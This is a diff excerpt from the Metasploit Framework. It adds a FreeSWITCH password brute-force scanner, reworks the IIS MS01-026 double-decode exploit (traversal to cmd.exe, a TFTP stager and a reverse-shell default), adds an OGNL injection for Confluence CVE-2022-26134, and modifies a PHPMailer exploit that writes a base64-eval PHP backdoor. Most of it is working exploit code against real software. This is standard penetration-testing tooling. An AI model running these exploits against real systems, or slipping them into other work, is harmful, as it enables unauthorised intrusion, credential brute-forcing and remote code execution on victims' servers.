+      fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
+    end
 
     handle_args = PIPE_HANDLES[datastore['PIPE'].to_sym]
     fail_with(Failure::BadConfig, "Invalid pipe: #{datastore['PIPE']}") unless handle_args

modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb

@@ -0,0 +1,117 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/freeswitch_event_socket'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'FreeSWITCH Event Socket Login',
+        'Description' => %q{
+          This module tests FreeSWITCH Event Socket logins on a range of
+          machines and report successful attempts.
+        },
+        'Author' => [
+          'krastanoel'
+        ],
+        'References' => [
+          ['URL', 'https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket']
+        ],
+        'DefaultOptions' => { 'VERBOSE' => false },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8021),
+        OptString.new('PASSWORD', [false, 'FreeSWITCH event socket default password', 'ClueCon']),
+        OptPath.new('PASS_FILE',
+                    [
+                      false,
+                      'The file that contains a list of of probable passwords.',
+                      File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
+                    ])
+      ]
+    )
+
+    # freeswitch does not have an username, there's only password
+    deregister_options(
+      'DB_ALL_CREDS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING', 'BLANK_PASSWORDS',
+      'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE',
+      'PASSWORD_SPRAY', 'STOP_ON_SUCCESS'
+    )
+  end
+
+  def run_host(ip)
+    cred_collection = Metasploit::Framework::PrivateCredentialCollection.new(
+      password: datastore['PASSWORD'],
+      pass_file: datastore['PASS_FILE']
+    )
+    cred_collection = prepend_db_passwords(cred_collection)
+
+    scanner = Metasploit::Framework::LoginScanner::FreeswitchEventSocket.new(
+      host: ip,
+      port: rport,
+      cred_details: cred_collection,
+      stop_on_success: true, # this will have no effect due to the scanner behaviour when scanning without username
+      connection_timeout: 10
+    )
+
+    scanner.scan! do |result|
+      credential_data = result.to_h
+      credential_data.merge!(
+        module_fullname: fullname,
+        workspace_id: myworkspace_id
+      )
+
+      if result.success?
+        credential_data.delete(:username) # This service uses no username
+        credential_core = create_credential(credential_data)
+        credential_data[:core] = credential_core
+        create_credential_login(credential_data)
+
+        if datastore['VERBOSE']
+          vprint_good("Login Successful: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")
+        else
+          print_good("Login Successful: #{result.credential.private}")
+        end
+      else
+        invalidate_login(credential_data)
+        vprint_error("LOGIN FAILED: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")
+      end
+    end
+  end
+
+  def check_host(_ip)
+    connect
+    banner = sock.get
+    disconnect(sock)
+
+    if banner.include?('Access Denied, go away.') || banner.include?('text/rude-rejection')
+      return Exploit::CheckCode::Safe('Access denied by network ACL')
+    end
+
+    unless banner.include?('Content-Type: auth/request')
+      return Exploit::CheckCode::Unknown('Unable to determine the service fingerprint')
+    end
+
+    return Exploit::CheckCode::Appears
+  end
+end

modules/exploits/linux/misc/hikvision_rtsp_bof.rb

@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'CVE', '2014-4880' ],
-          [ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities' ]
+          [ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities' ]
         ],
       'Platform'       => 'linux',
       'Arch'           => ARCH_ARMLE,

modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb

@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Spencer McIntyre'
         ],
         'References' => [
-          ['CVE', '2021-26084'],
+          ['CVE', '2022-26134'],
           ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],
           ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],
           ['URL', 'https://github.com/jbaines-r7/through_the_wire'],
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2022-06-02',
         'License' => MSF_LICENSE,
-        'Platform' => ['unix', 'linux'],
+        'Platform' => ['unix', 'linux', 'win'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => false,
         'Targets' => [
@@ -54,6 +54,22 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => [ARCH_X86, ARCH_X64],
               'Type' => :dropper
             }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper
+            }
           ]
         ],
         'DefaultTarget' => 0,
@@ -74,22 +90,45 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    version = get_confluence_version
-    return CheckCode::Unknown unless version
+    confluence_version = get_confluence_version
+    return CheckCode::Unknown unless confluence_version
 
-    vprint_status("Detected Confluence version: #{version}")
-    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
-    res = inject_ognl('', header: header) # empty command works for testing, the header will be set
+    vprint_status("Detected Confluence version: #{confluence_version}")
 
-    return CheckCode::Unknown unless res
-
-    unless res && res.headers.include?(header)
+    confluence_platform = get_confluence_platform
+    unless confluence_platform
       return CheckCode::Safe('Failed to test OGNL injection.')
     end
 
+    vprint_status("Detected target platform: #{confluence_platform}")
     CheckCode::Vulnerable('Successfully tested OGNL injection.')
   end
 
+  def get_confluence_platform
+    # this method gets the platform by exploiting CVE-2022-26134
+    return @confluence_platform if @confluence_platform
+
+    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
+    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
+      ${
+        Class.forName("com.opensymphony.webwork.ServletActionContext")
+          .getMethod("getResponse",null)
+          .invoke(null,null)
+          .setHeader(
+            "#{header}",
+            Class.forName("javax.script.ScriptEngineManager")
+              .newInstance()
+              .getEngineByName("js")
+              .eval("java.lang.System.getProperty('os.name')")
+            )
+      }
+    OGNL
+    res = inject_ognl(ognl)
+    return nil unless res
+
+    res.headers[header]
+  end
+
   def get_confluence_version
     return @confluence_version if @confluence_version
 
@@ -107,6 +146,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    confluence_platform = get_confluence_platform
+    unless confluence_platform
+      fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')
+    end
+
+    unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')
+      fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")
+    end
+
     print_status("Executing #{payload_instance.refname} (#{target.name})")
 
     case target['Type']
@@ -119,26 +167,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
-    res = inject_ognl(cmd, header: header)
-
-    unless res && res.headers.include?(header)
-      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
-    end
-
-    vprint_good("Successfully executed command: #{cmd}")
-    res.headers[header]
-  end
-
-  def inject_ognl(cmd, header:)
-    send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),
-      'headers' => { header => cmd }
-    )
-  end
-
-  def ognl_payload(_cmd, header:)
-    <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
+    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
       ${
         Class.forName("com.opensymphony.webwork.ServletActionContext")
           .getMethod("getResponse",null)
@@ -154,5 +183,20 @@ class MetasploitModule < Msf::Exploit::Remote
             )
       }
     OGNL
+    res = inject_ognl(ognl, 'headers' => { header => cmd })
+
+    unless res && res.headers.include?(header)
+      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
+    end
+
+    vprint_good("Successfully executed command: #{cmd}")
+    res.headers[header]
+  end
+
+  def inject_ognl(ognl, opts = {})
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl), 'dashboard.action')
+    }.merge(opts))
   end
 end

modules/exploits/multi/http/phpmailer_arg_injection.rb

@@ -60,7 +60,10 @@ class MetasploitModule < Msf::Exploit::Remote
       ])
     register_advanced_options(
       [
-        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300])
+        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300]),
+        OptString.new('NameField', [true, 'Name of the element for the Name field', 'name'], regex: /^([^\t\n\f \/>"'=]+)$/),
+        OptString.new('EmailField', [true, 'Name of the element for the Email field', 'email'], regex: /^([^\t\n\f \/>"'=]+)$/),
+        OptString.new('MessageField', [true, 'Name of the element for the Message field', 'message'], regex: /^([^\t\n\f \/>"'=]+)$/)
       ])
   end
 
@@ -98,6 +101,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    name_field = datastore['NameField']
+    email_field = datastore['EmailField']
+    message_field = datastore['MessageField']
     payload_file_name = "#{rand_text_alphanumeric(8)}.php"
     payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
 
@@ -111,9 +117,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     data = Rex::MIME::Message.new
     data.add_part('submit', nil, nil, 'form-data; name="action"')
-    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
-    data.add_part(email, nil, nil, 'form-data; name="email"')
-    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')
+    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, "form-data; name='#{name_field}'")
+    data.add_part(email, nil, nil, "form-data; name='#{email_field}'")
+    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, "form-data; name='#{message_field}'")
 
     print_status("Writing the backdoor to #{payload_file_path}")
     res = send_request_cgi(

modules/exploits/multi/misc/nomad_exec.rb

@@ -52,8 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2021-05-17',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'Reliability' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
-          'SideEffects' => [REPEATABLE_SESSION]
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
         }
       )
     )

modules/exploits/windows/iis/ms01_026_dbldecode.rb

@@ -2,15 +2,13 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-require 'rex/exploitation'
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  # NOTE: This cannot be an HttpClient module since the response from the server
-  # is not a valid HttpResponse
-  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -21,7 +19,16 @@ class MetasploitModule < Msf::Exploit::Remote
           This module will execute an arbitrary payload on a Microsoft IIS installation
           that is vulnerable to the CGI double-decode vulnerability of 2001.
 
-          NOTE: This module will leave a metasploit payload in the IIS scripts directory.
+          This module has been tested successfully on:
+
+          Windows 2000 Professional (SP0) (EN);
+          Windows 2000 Professional (SP1) (AR);
+          Windows 2000 Professional (SP1) (CZ);
+          Windows 2000 Server (SP0) (FR);
+          Windows 2000 Server (SP1) (EN); and
+          Windows 2000 Server (SP1) (SE).
+
+          Note: This module will leave a Metasploit payload exe in the IIS scripts directory.
         },
         'Author' => [ 'jduck' ],
         'License' => MSF_LICENSE,
@@ -34,27 +41,41 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Platform' => 'win',
         'Targets' => [
-          [ 'Automatic', {} ]
+          [
+            'Windows (Dropper)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86],
+              'DefaultOptions' => { 'PAYLOAD' => 'windows/shell/reverse_tcp' },
+              'Type' => :win_dropper
+            }
+          ],
+          [
+            'Windows (Command)',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' },
+              'Type' => :win_command
+            }
+          ]
         ],
         'CmdStagerFlavor' => 'tftp',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
+        },
         'DefaultTarget' => 0,
-        'DisclosureDate' => '2001-05-15',
-        'Compat' => {
-          'Meterpreter' => {
-            'Commands' => %w[
-              stdapi_fs_delete_file
-              stdapi_sys_process_execute
-            ]
-          }
-        }
+        'DisclosureDate' => '2001-05-15'
       )
     )
 
     register_options(
       [
         Opt::RPORT(80),
-        OptString.new('WINDIR', [ false, 'The windows directory of the target host', nil ]),
-        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ])
+        OptString.new('WINDIR', [ false, 'The Windows directory name of the target host', nil ]),
+        OptInt.new('DEPTH', [ true, 'Traversal depth to reach the drive root', 2 ])
       ]
     )
 
@@ -62,181 +83,126 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def dotdotslash
-    possibilities = [
-      "..%255c",
-      "..%%35c",
-      "..%%35%63",
-      "..%25%35%63",
-      ".%252e/",
-      "%252e./",
-      "%%32%65./",
-      ".%%32%65/",
-      ".%25%32%65/",
-      "%25%32%65./"
-    ]
-    possibilities[rand(possibilities.length)]
+    [
+      '..%255c',
+      '..%%35c',
+      '..%%35%63',
+      '..%25%35%63',
+      '.%252e/',
+      '%252e./',
+      '%%32%65./',
+      '.%%32%65/',
+      '.%25%32%65/',
+      '%25%32%65./'
+    ].sample
   end
 
-  def mini_http_request(opts, timeout = 5)
-    connect
-    req = ''
-    req << opts['method']
-    req << ' '
-    req << opts['uri']
-    req << ' '
-    req << "HTTP/1.0\r\n"
-    req << "Host: #{datastore['RHOST']}\r\n"
-    req << "\r\n"
-    sock.put(req)
+  # Detect the correct Windows directory name.
+  # Unfortunately, the IIS scripts directory must
+  # be located on the same drive as %SystemRoot%.
+  def detect_windows_directory
+    win_dirs = %w[winnt windows]
+    matches = [
+      'Directory of',
+      '\\inetpub\\',
+      "\\scripts\r\n"
+    ]
 
-    # This isn't exactly awesome, but it seems to work..
-    begin
-      headers = sock.get_once(-1, timeout) || ''
-      body = sock.get_once(-1, timeout) || ''
-    rescue ::EOFError
-      # nothing
+    win_dirs.each do |dir|
+      res = execute_command('dir', windir: dir)
+      next unless res
+      next unless res.code == 200
+      next unless res.body
+
+      matches.each do |m|
+        return dir if res.body.to_s.include?(m)
+      end
     end
 
-    disconnect
-    [headers, body]
-  end
-
-  def detect_windows_dir()
-    win_dirs = [ 'winnt', 'windows' ]
-    win_dirs.each { |dir|
-      res = execute_command("dir", { :windir => dir })
-      if (res.kind_of?(Array))
-        body = res[1]
-        if (body and body =~ /Directory of /)
-          return dir
-        end
-      end
-    }
-    return nil
+    nil
   end
 
   def check
-    @win_dir = detect_windows_dir()
-    if @win_dir
-      return Exploit::CheckCode::Vulnerable
-    end
-
-    Exploit::CheckCode::Safe
+    win_dir = detect_windows_directory
+    win_dir ? CheckCode::Vulnerable("Found Windows directory name: #{win_dir}") : CheckCode::Safe
   end
 
-  #
-  # NOTE: the command executes regardless of whether or not
-  # a valid response is returned...
-  #
   def execute_command(cmd, opts = {})
-    # Don't try the start command...
-    # Using the "start" method doesn't seem to make iis very happy :(
-    return [nil, nil] if cmd =~ /^start [a-zA-Z]+\.exe$/
+    # Don't run the start command...
+    # We'll execute the payload via IIS later.
+    # Using the "start" method doesn't seem to make IIS very happy :(
+    return if cmd.start_with?('start') && cmd.include?('.exe')
 
-    print_status("Executing command: #{cmd} (options: #{opts.inspect})")
-
-    uri = '/scripts/'
-    exe = opts[:cgifname]
-    if (not exe)
-      uri << dotdotslash
-      uri << dotdotslash
-      uri << (opts[:windir] || @win_dir)
-      uri << '/system32/cmd.exe'
+    vprint_status("Executing command: #{cmd}")
+    if opts[:cgifname]
+      cmd_path = opts[:cgifname]
     else
-      uri << exe
+      cmd_path = ''
+      datastore['DEPTH'].times { cmd_path << dotdotslash }
+      cmd_path << (opts[:windir] || @win_dir)
+      cmd_path << '/system32/cmd.exe'
     end
-    uri << '?/x+/c+'
-    uri << Rex::Text.uri_encode(cmd)
+    uri = "/scripts/#{cmd_path}?/x+/c+#{Rex::Text.uri_encode(cmd)}"
+    send_request_cgi({ 'uri' => uri }, 20)
+  end
 
-    vprint_status("Attempting to execute: #{uri}")
-
-    mini_http_request({
-      'uri' => uri,
-      'method' => 'GET',
-    }, 20)
+  def copy_cmd_exe_to_scripts_directory
+    fname = "#{rand_text_alphanumeric(4..7)}.exe"
+    print_status("Copying \"\\#{@win_dir}\\system32\\cmd.exe\" to the IIS scripts directory as \"#{fname}\"...")
+    res = execute_command("copy \\#{@win_dir}\\system32\\cmd.exe #{fname}")
+    fail_with(Failure::Unknown, 'No reply from server') unless res
+    fname
   end
 
   def exploit
-    @win_dir = datastore['WINDIR']
-    if not @win_dir
-      # try to detect the windows directory
-      @win_dir = detect_windows_dir()
-      if not @win_dir
-        fail_with(Failure::NoTarget, "Unable to detect the target host windows directory (maybe not vulnerable)!")
-      end
-    end
-    print_status("Using windows directory \"#{@win_dir}\"")
+    @win_dir = datastore['WINDIR'] || detect_windows_directory
 
-    # now copy the file
-    exe_fname = rand_text_alphanumeric(4 + rand(4)) + ".exe"
-    print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...")
-    # NOTE: this assumes %SystemRoot% on the same drive as the web scripts directory
-    # Unfortunately, using %SystemRoot% doesn't seem to work :(
-    res = execute_command("copy \\#{@win_dir}\\system32\\cmd.exe #{exe_fname}")
+    fail_with(Failure::NotVulnerable, 'Unable to detect the target host Windows directory (maybe not vulnerable)!') unless @win_dir
 
-    if (datastore['CMD'])
-      res = execute_command(datastore['CMD'], { :cgifname => exe_fname })
-      if (res[0])
-        print_status("Command output:\n" + res[0])
+    print_status("Using Windows directory \"#{@win_dir}\"")
+
+    @cmd_exe_fname = copy_cmd_exe_to_scripts_directory
+
+    case target['Type']
+    when :win_command
+      res = execute_command(payload.encoded, cgifname: @cmd_exe_fname)
+
+      if res && res.body
+        cmd_res = res.code == 200 ? res.body : res.body.to_s.scan(%r{<pre>(.*?)</pre>}m).flatten.first.to_s
+        if cmd_res.strip.blank?
+          print_status('Command returned no output')
+        else
+          print_good('Command output:')
+          print_line(cmd_res)
+        end
       else
-        print_error("No output received")
+        print_error('No reply')
       end
+    when :win_dropper
+      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      execute_cmdstager(
+        temp: '.',
+        linemax: 1_400,
+        cgifname: @cmd_exe_fname,
+        tftphost: tftphost,
+        # Force noconcat so we can skip the "start" command in execute_command method
+        noconcat: true,
+        # We can't delete the payload while it is running, so don't try
+        nodelete: true
+      )
 
-      res = execute_command("del #{exe_fname}")
-      return
+      exe_payload = stager_instance.payload_exe
+      register_file_for_cleanup(exe_payload)
+
+      print_status("Triggering payload \"#{exe_payload}\" via a direct request...")
+      send_request_cgi({ 'uri' => "/scripts/#{exe_payload}" }, 1)
     end
-
-    # Use the CMD stager to get a payload running
-    execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
-
-    # Save these file names for later deletion
-    @exe_cmd_copy = exe_fname
-    @exe_payload = stager_instance.payload_exe
-
-    # Just for good measure, we'll make a quick, direct request for the payload
-    # Using the "start" method doesn't seem to make iis very happy :(
-    print_status("Triggering the payload via a direct request...")
-    mini_http_request({ 'uri' => '/scripts/' + stager_instance.payload_exe, 'method' => 'GET' }, 1)
-
-    handler
   end
 
-  #
-  # The following handles deleting the copied cmd.exe and payload exe!
-  #
-  def on_new_session(client)
-    if client.type != "meterpreter"
-      print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
-      print_error("The copied exe and the payload exe must be removed manually.")
-      return
-    end
-
-    return if not @exe_cmd_copy
-
-    # stdapi must be loaded before we can use fs.file
-    client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
-
-    # Delete the copied CMD.exe
-    print_status("Deleting copy of CMD.exe \"#{@exe_cmd_copy}\" ...")
-    client.fs.file.rm(@exe_cmd_copy)
-
-    # Migrate so  that we can delete the payload exe
-    client.console.run_single("run migrate -f")
-
-    # Delete the payload exe
-    return if not @exe_payload
-
-    delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload
-
-    print_status("Changing permissions on #{delete_me_too} ...")
-    cmd = "C:\\#{@win_dir}\\system32\\attrib.exe -r -h -s " + delete_me_too
-    client.sys.process.execute(cmd, nil, { 'Hidden' => true })
-
-    print_warning("Deleting #{delete_me_too} ...")
-    begin
-      client.fs.file.rm(delete_me_too)
-    rescue ::Exception => e
-      print_error("Exception: #{e.inspect}")
-    end
+  # Remove the copied cmd.exe from the IIS scripts directory
+  def cleanup
+    execute_command("del #{@cmd_exe_fname}") if @cmd_exe_fname
+  ensure
+    super
   end
 end

modules/payloads/adapters/cmd/windows/powershell.rb

@@ -34,15 +34,26 @@ module MetasploitModule
     super
   end
 
-  def generate
+  def generate(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
     payload = super
 
     cmd_psh_payload(payload, ARCH_X86, remove_comspec: true)
   end
 
+  def generate_stage(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
+
   def generate_payload_uuid(conf = {})
     conf[:arch] ||= module_info['AdaptedArch']
     conf[:platform] ||= module_info['AdaptedPlatform']
     super
   end
+
+  def handle_connection(conn, opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
 end

modules/payloads/adapters/cmd/windows/powershell/x64.rb

@@ -34,15 +34,26 @@ module MetasploitModule
     super
   end
 
-  def generate
+  def generate(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
     payload = super
 
     cmd_psh_payload(payload, ARCH_X64, remove_comspec: true)
   end
 
+  def generate_stage(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
+
   def generate_payload_uuid(conf = {})
     conf[:arch] ||= module_info['AdaptedArch']
     conf[:platform] ||= module_info['AdaptedPlatform']
     super
   end
+
+  def handle_connection(conn, opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
 end

modules/post/windows/escalate/getsystem.rb

@@ -28,12 +28,22 @@ class MetasploitModule < Msf::Post
               priv_elevate_getsystem
             ]
           }
+        },
+        'Notes' => {
+          'AKA' => [
+            'Named Pipe Impersonation',
+            'Token Duplication',
+            'RPCSS',
+            'PrintSpooler',
+            'EFSRPC',
+            'EfsPotato'
+          ]
         }
       )
     )
 
     register_options([
-      OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-5), otherwise try them all", 0])
+      OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-6), otherwise try them all", 0])
     ])
   end
 

spec/lib/msf/core/auxiliary/juniper_spec.rb

@@ -1,31 +1,36 @@
 # -*- coding: binary -*-
-require 'spec_helper'
 
+require 'spec_helper'
 
 RSpec.describe Msf::Auxiliary::Juniper do
   class DummyJuniperClass
     include Msf::Auxiliary::Juniper
     def framework
       Msf::Simple::Framework.create(
-          'ConfigDirectory' => Rails.root.join('spec', 'dummy', 'framework', 'config').to_s,
-          # don't load any module paths so we can just load the module under test and save time
-          'DeferModuleLoads' => true
+        'ConfigDirectory' => Rails.root.join('spec', 'dummy', 'framework', 'config').to_s,
+        # don't load any module paths so we can just load the module under test and save time
+        'DeferModuleLoads' => true
       )
     end
+
     def active_db?
       true
     end
-    def print_good(str=nil)
-      raise StandardError.new("This method needs to be stubbed.")
+
+    def print_good(_str = nil)
+      raise StandardError, 'This method needs to be stubbed.'
     end
-    def store_cred(hsh=nil)
-      raise StandardError.new("This method needs to be stubbed.")
+
+    def store_cred(_hsh = nil)
+      raise StandardError, 'This method needs to be stubbed.'
     end
+
     def fullname
-      "auxiliary/scanner/snmp/juniper_dummy"
+      'auxiliary/scanner/snmp/juniper_dummy'
     end
+
     def myworkspace
-      raise StandardError.new("This method needs to be stubbed.")
+      raise StandardError, 'This method needs to be stubbed.'
     end
   end
 
@@ -34,12 +39,11 @@ RSpec.describe Msf::Auxiliary::Juniper do
   let!(:workspace) { FactoryBot.create(:mdm_workspace) }
 
   context '#create_credential_and_login' do
-
     let(:session) { FactoryBot.create(:mdm_session) }
 
-    let(:task) { FactoryBot.create(:mdm_task, workspace: workspace)}
+    let(:task) { FactoryBot.create(:mdm_task, workspace: workspace) }
 
-    let(:user) { FactoryBot.create(:mdm_user)}
+    let(:user) { FactoryBot.create(:mdm_user) }
 
     subject(:test_object) { DummyJuniperClass.new }
 
@@ -47,7 +51,7 @@ RSpec.describe Msf::Auxiliary::Juniper do
     let(:service) { FactoryBot.create(:mdm_service, host: FactoryBot.create(:mdm_host, workspace: workspace)) }
     let(:task) { FactoryBot.create(:mdm_task, workspace: workspace) }
 
-    let(:login_data) {
+    let(:login_data) do
       {
         address: service.host.address,
         port: service.port,
@@ -63,12 +67,12 @@ RSpec.describe Msf::Auxiliary::Juniper do
         private_type: :nonreplayable_hash,
         status: Metasploit::Model::Login::Status::UNTRIED
       }
-    }
+    end
 
     it 'creates a Metasploit::Credential::Login' do
-      expect{test_object.create_credential_and_login(login_data)}.to change{Metasploit::Credential::Login.count}.by(1)
+      expect { test_object.create_credential_and_login(login_data) }.to change { Metasploit::Credential::Login.count }.by(1)
     end
-    it "associates the Metasploit::Credential::Core with a task if passed" do
+    it 'associates the Metasploit::Credential::Core with a task if passed' do
       login = test_object.create_credential_and_login(login_data.merge(task_id: task.id))
       expect(login.tasks).to include(task)
     end
@@ -81,164 +85,159 @@ RSpec.describe Msf::Auxiliary::Juniper do
 
     it 'deals with admin credentials' do
       expect(aux_juniper).to receive(:print_good).with('Admin user netscreen found with password hash nKVUM2rwMUzPcrkG5sWIHdCtqkAibn')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
+      expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
       expect(aux_juniper).to receive(:create_credential_and_login).with(
         {
-          address: "127.0.0.1",
+          address: '127.0.0.1',
           port: 161,
-          protocol: "tcp",
+          protocol: 'tcp',
           workspace_id: workspace.id,
           origin_type: :service,
           service_name: '',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          username: "netscreen",
-          private_data: "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn",
+          module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+          username: 'netscreen',
+          private_data: 'nKVUM2rwMUzPcrkG5sWIHdCtqkAibn',
           private_type: :nonreplayable_hash,
           status: Metasploit::Model::Login::Status::UNTRIED
         }
       )
-      aux_juniper.juniper_screenos_config_eater('127.0.0.1',161,
-        "set admin name \"netscreen\"\n" <<
-        "set admin password \"nKVUM2rwMUzPcrkG5sWIHdCtqkAibn\"\n")
+      aux_juniper.juniper_screenos_config_eater('127.0.0.1', 161,
+                                                "set admin name \"netscreen\"\n" <<
+                                                "set admin password \"nKVUM2rwMUzPcrkG5sWIHdCtqkAibn\"\n")
     end
 
     it 'deals with user account with password hash' do
       expect(aux_juniper).to receive(:print_good).with('User 1 named testuser found with password hash 02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=. Enable permission: enable')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
-      expect(aux_juniper).to receive(:store_loot).with("juniper.netscreen.config", "text/plain", "127.0.0.1",
-          "set user \"testuser\" uid 1\n" <<
-          "set user \"testuser\" type auth\n" <<
-          "set user \"testuser\" hash-password \"02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=\"\n" <<
-          "set user \"testuser\" enable",
-        "config.txt", "Juniper Netscreen Configuration"
-      )
+      expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
+      expect(aux_juniper).to receive(:store_loot).with('juniper.netscreen.config', 'text/plain', '127.0.0.1',
+                                                       "set user \"testuser\" uid 1\n" <<
+                                                       "set user \"testuser\" type auth\n" <<
+                                                       "set user \"testuser\" hash-password \"02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=\"\n" <<
+                                                       'set user "testuser" enable',
+                                                       'config.txt', 'Juniper Netscreen Configuration')
       expect(aux_juniper).to receive(:create_credential_and_login).with(
         {
-          address: "127.0.0.1",
+          address: '127.0.0.1',
